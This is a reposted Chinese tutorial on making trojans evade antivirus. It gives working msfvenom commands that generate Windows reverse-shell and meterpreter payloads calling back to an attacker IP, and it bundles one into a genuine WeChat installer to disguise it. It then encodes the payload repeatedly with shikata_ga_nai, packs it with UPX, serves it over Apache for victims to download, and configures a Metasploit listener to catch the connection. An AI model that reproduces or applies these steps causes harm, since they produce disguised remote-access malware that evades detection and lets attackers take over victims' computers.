0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

免杀技术与杀软技术的区别

马哥Linux运维 来源:FreeBuf 作者:FreeBuf 2022-07-08 10:49 次阅读
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。

1、裸奔马的尝试

意为不做任何免杀处理的木马

1、使用msf的msfvenom生成木马文件,生成一个裸奔马,命名为 weixin.exe吧

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe 》 weixin.exe

abf372ee-fdf9-11ec-ba43-dac502259ad0.jpg

2、部署一下kali上的apache服务,令目标机器能够访问下载我们生成的木马

2.1、kali中是自带有apache的,启动apache服务

ac0b1098-fdf9-11ec-ba43-dac502259ad0.jpg

2.2、把生成的weixin.exe文件放在/var/www/html文件夹下

ac23dd8a-fdf9-11ec-ba43-dac502259ad0.jpg

2.3、在靶机下访问192.168.111.132/weinxin.exe,已经下载

ac3774c6-fdf9-11ec-ba43-dac502259ad0.jpg

2.4、发现被AV查杀

ac4d0750-fdf9-11ec-ba43-dac502259ad0.jpg

ac5d624e-fdf9-11ec-ba43-dac502259ad0.jpg

如果在实战中,直接投递裸奔马比较容易引起对方运维人员的警觉,这种方式也比较冒险,所以在投递之前,要测试制作的木马是否会引起相关AV的查杀,比如在在线多引擎病毒识别工具中去测试

2.5、这里po一个在线杀毒查杀的网站,virustotal是一个提供免费的可疑文件分析服务的网站,它与传统杀毒软件的不同之处是它通过多种反病毒引擎扫描文件。使用多种反病毒引擎对您所上传的文件进行检测, 以判断文件是否被病毒, 蠕虫, 木马, 以及各类恶意软件感染。

ac70f1a6-fdf9-11ec-ba43-dac502259ad0.jpg

2、MSF编码

在metasploit框架下免杀的方式之一是msf编码器,功能是使用msf编码器对我们制作的木马进行重新编码,生成一个二进制文件,这个文件运行后,msf编码器会将原始程序解码到内存中并执行。

1、在kali终端输入 msfvenom -l encoders,这可以列出所有可用的编码格式

ac8cc3e0-fdf9-11ec-ba43-dac502259ad0.jpg

2、在msf的/data/templates/下有很多metasploit自带的用于捆绑木马的程序模板,这个模块但是一些反病毒厂商关注的重点,为了更好的实现免杀,我们需要自主选择一个待捆绑程序。在这里选择是真正的微信安装包。(也有对裸奔马进行shikata_ga_nai编码饶AV的方法,但是shikata_ga_nai编码技术多态,每次生成的攻击载荷文件都不一样,有时生成的文件会被查杀,有时不会,所以结合以上思路,生成一个捆绑木马,并进行shikata_ga_nai编码)

aca4ddc2-fdf9-11ec-ba43-dac502259ad0.jpg

把微信安装包放在/root文件夹下

acbae414-fdf9-11ec-ba43-dac502259ad0.jpg

3、使用msfvenom生成一个Windows环境下的木马,并捆绑到WeChatSetup.exe上生成WeChatSetup1.exe的合成马,同时对木马进行x86/shikata_ga_nai进行多次编码的方式进行免杀处理。

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

acd4c0dc-fdf9-11ec-ba43-dac502259ad0.jpg

参数说明:

-e /指定编码方式对攻击载荷进行重新编码

-x /指定木马捆绑在哪个可执行程序模板上

-i /指定对目标进行编码的次数,多次编码理论上有助于免杀的实现

-f /指定msf编码器输出程序的格式

-0 /指定处理完毕后的文件输出路径

4、把生成的文件放在kali中的apache服务对应的文件夹下,令攻击机访问

aceb1e7c-fdf9-11ec-ba43-dac502259ad0.jpg

5、攻击机下载后,在msf上创建监听

use exploit/multi/handler

set payload windows/shell/reverse_tcp ///选择payload为Windows/shell/reverse_tcp

show options ///查看一下哪些选项需要配置

set lhost 192.168.111.132 ///设置一下主机地址

set lport 9999 ///设置下主机端口,为木马设定的端口

run

ad0360e0-fdf9-11ec-ba43-dac502259ad0.jpg

6、在目标机器上点击伪造的安装包,没有打开,因为捆绑木马并多次编码后,安装包源文件已经损坏,但是在攻击机的,目标机器已经上线

ad16150a-fdf9-11ec-ba43-dac502259ad0.jpg

3、UPX加壳

upx打包器有两种功能,一种叫做给程序加壳,一种叫压缩程序,在这里使用打包器的目的是改变后门程序的特征码。

压缩的时候:它首先可执行文件中的可执行数据解压出来,然后将解压缩用的代码附加在前面

运行的时候:将原本的可执行数据解压出来,然后再运行解压缩后的数据

1、在kali中内置了upx打包器,输入upx可以看下参数介绍

ad3097ea-fdf9-11ec-ba43-dac502259ad0.jpg

2、简单的命令就是直接upx file,对file文件进行加壳处理,加壳后,因为经过压缩,文件大小会变小

ad5161e6-fdf9-11ec-ba43-dac502259ad0.jpg

3、还是老样子,把上面经历过编码后,又加壳的weixin安装包放在apache服务的文件夹下,供目标机器读取下载(如上2.4)

ad6f17cc-fdf9-11ec-ba43-dac502259ad0.jpg

4、在msf上可以创建正常的连接和监听,成功传回

ad9fade2-fdf9-11ec-ba43-dac502259ad0.jpg

后言

免杀技术也被安全技术厂商盯上并开发相对应的检测技术,所以免杀技术与杀软技术是互相促进发展的,而且发展速度很快,有些现在可以测试成功的杀软技术,过段时间就不能用了。免杀技术还需要狠下功夫去研究,接下来也会尝试python,GO写的免杀,也会在后续文章中叙述进展!

原文标题:渗透测试-木马免杀的几种方式

文章出处:【微信公众号:马哥Linux运维】欢迎添加关注!文章转载请注明出处。

审核编辑:彭静
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • 软件
    +关注

    关注

    69

    文章

    5298

    浏览量

    90884
  • 木马
    +关注

    关注

    0

    文章

    47

    浏览量

    13662
  • python
    +关注

    关注

    57

    文章

    4858

    浏览量

    89587
收藏 人收藏
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

    评论

    相关推荐
    热点推荐

    AI眼镜疯了!Meta、小米都在抢,恒玄砸1.5亿,脑机技术也来了

      电子发烧友网报道(文/莫婷婷)随着AI智能眼镜产业迈入高速发展通道,产品形态创新与技术体系完善正以超预期速度同步推进,语音支付、脑机接口等技术落地AI智能眼镜,智能眼镜正在从“极客玩具”蜕变
    的头像 发表于 07-23 07:21 1.2w次阅读
    AI眼镜<b class='flag-5'>杀</b>疯了!Meta、小米都在抢,恒玄砸1.5亿,脑机<b class='flag-5'>技术</b>也来了

    解析LGA与BGA芯片封装技术区别

    在当今电子设备追求轻薄短小的趋势下,芯片封装技术的重要性日益凸显。作为两种主流的封装方式,LGA和BGA各有特点,而新兴的激光锡球焊接技术正在为封装工艺带来革命性的变化。本文将深入解析LGA与BGA的区别,并探讨激光锡球焊接
    的头像 发表于 11-19 09:22 661次阅读
    解析LGA与BGA芯片封装<b class='flag-5'>技术</b>的<b class='flag-5'>区别</b>

    AI影像新高度!性能提升40%,高通与虹携手发布超域融合视频技术

    公司联合高通展示了视频超域融合技术。据悉,在骁龙技术峰会上,虹高级副总裁兼首席营销官徐坚首次公开展示了虹基于全球骁龙8平台打造的超域
    的头像 发表于 10-15 07:17 1.1w次阅读
    AI影像新高度!性能提升40%,高通与虹<b class='flag-5'>软</b>携手发布超域融合视频<b class='flag-5'>技术</b>

    通动力入选2025新一代信息技术应用优秀案例

    近日,DBC德本咨询正式发布“2025新一代信息技术应用优秀案例”榜单,通动力信息技术(集团)股份有限公司携手广西星网智云科技有限公司,为广西玉柴机器集团有限公司打造的“玉柴数智化审计业务场景项目”成功入选,位列榜单第二名,充
    的头像 发表于 09-28 17:48 1142次阅读

    通动力中标卓望公司技术服务框架采购项目

    近日,通动力成功中标卓望信息技术(北京)有限公司(以下简称“卓望公司”)2025—2027年技术服务框架采购项目,中标份额排名第一。本次中标不仅彰显了通动力在
    的头像 发表于 09-06 10:28 948次阅读

    一种基于红外吸收光谱技术校准气体传感芯片

    近日,天津大学精密仪器与光电子工程学院的光子芯片实验室研发了一种基于红外吸收光谱技术校准气体传感芯片,成果获得中国发明专利(ZL202411675536.3)授权。
    的头像 发表于 07-29 10:32 718次阅读
    一种基于红外吸收光谱<b class='flag-5'>技术</b>的<b class='flag-5'>免</b>校准气体传感芯片

    磁集成技术磁材料有何要求?

    元件集成到单一磁芯或复合结构中,显著降低系统损耗并提升功率密度,已广泛应用于新能源汽车、5G通信电源、数据中心及消费电子等领域。 然而,磁集成技术依然摆脱不了对磁材料性能升级的要求。传统磁材料(如铁氧体、硅钢)在高频、高温、
    的头像 发表于 07-24 11:57 543次阅读
    磁集成<b class='flag-5'>技术</b>对<b class='flag-5'>软</b>磁材料有何要求?

    颠覆智造:profinet转ethernet ip网关×发那科×西门子的三国

    颠覆智造: profinet转ethernet ip网关x 发那科×西门子的“三国”如何引爆汽车产线效能革命? 行业案例:汽车零部件柔性搬运系统集成应用 某汽车零部件工厂需升级生产线,实现不同型
    的头像 发表于 06-16 19:57 505次阅读
    颠覆智造:profinet转ethernet ip网关×发那科×西门子的三国<b class='flag-5'>杀</b>

    LC滤波器与电感、电容的区别技术分析与应用

    ​LC滤波器与电感、电容的区别技术分析与应用摘要LC滤波器是由电感(L)和电容(C)组成的被动电路,用于滤除特定频率的信号,广泛应用于电磁兼容(EMC)、信号处理和电源管理等领域。本文档详细分析
    的头像 发表于 05-12 20:19 1159次阅读
    LC滤波器与电感、电容的<b class='flag-5'>区别</b>:<b class='flag-5'>技术</b>分析与应用

    蓝牙5.4与蓝牙6.0的核心区别技术特性对比

    蓝牙5.4与蓝牙6.0的核心区别技术特性对比
    的头像 发表于 04-02 15:55 5.7w次阅读
    蓝牙5.4与蓝牙6.0的核心<b class='flag-5'>区别</b>及<b class='flag-5'>技术</b>特性对比

    MPLS和SR传输技术区别

    当你在游戏里“五”时卡顿,当你在视频会议中突然掉线,这些抓狂瞬间的背后,大多是数据传输丢包或者延迟造成的。而如何保证不丢包、低延迟,MPLS(Multiprotocol Label
    的头像 发表于 03-28 10:15 855次阅读
    MPLS和SR传输<b class='flag-5'>技术</b>的<b class='flag-5'>区别</b>

    通工业互联与重庆工程职业技术学院达成合作

    近日,通工业互联携手重庆工程职业技术学院,共同开展工业互联网实训设备升级,这一创新性教育赋能合作不仅再次证明了通动力在工业互联网领域的领先实力,也展现了公司致力于通过前沿技术赋能职
    的头像 发表于 03-27 11:13 824次阅读

    SLAMTEC Aurora:把深度学习“卷”进机器人日常

    在人工智能和机器人技术飞速发展的今天,深度学习与SLAM(同步定位与地图构建)技术的结合,正引领着智能机器人行业迈向新的高度。最近科技圈顶流DeepSeek简直疯了!靠着逆天的深度学习能力,从AI聊天到图像识别,分分钟秀翻全场
    的头像 发表于 02-19 15:49 725次阅读

    ArcMuse计算技术引擎全面升级

    经过半年多的潜心研发和技术攻关,虹ArcMuse计算技术引擎迎来全面升级,实现多项关键技术突破。升级内容涵盖高清视频生成、AI模特图高精度生成、智能试衣和平铺图生成等领域,有效攻克了
    的头像 发表于 12-11 17:34 1298次阅读

    连续拿下多项海外大奖,海信激光显示技术疯了

    2024年,海信激光显示产品凭借出色的技术创新和市场表现,连续荣获PC Mag Editors' Choice、Tech Radar  Recommends和Projector Reviews
    的头像 发表于 12-09 13:54 1228次阅读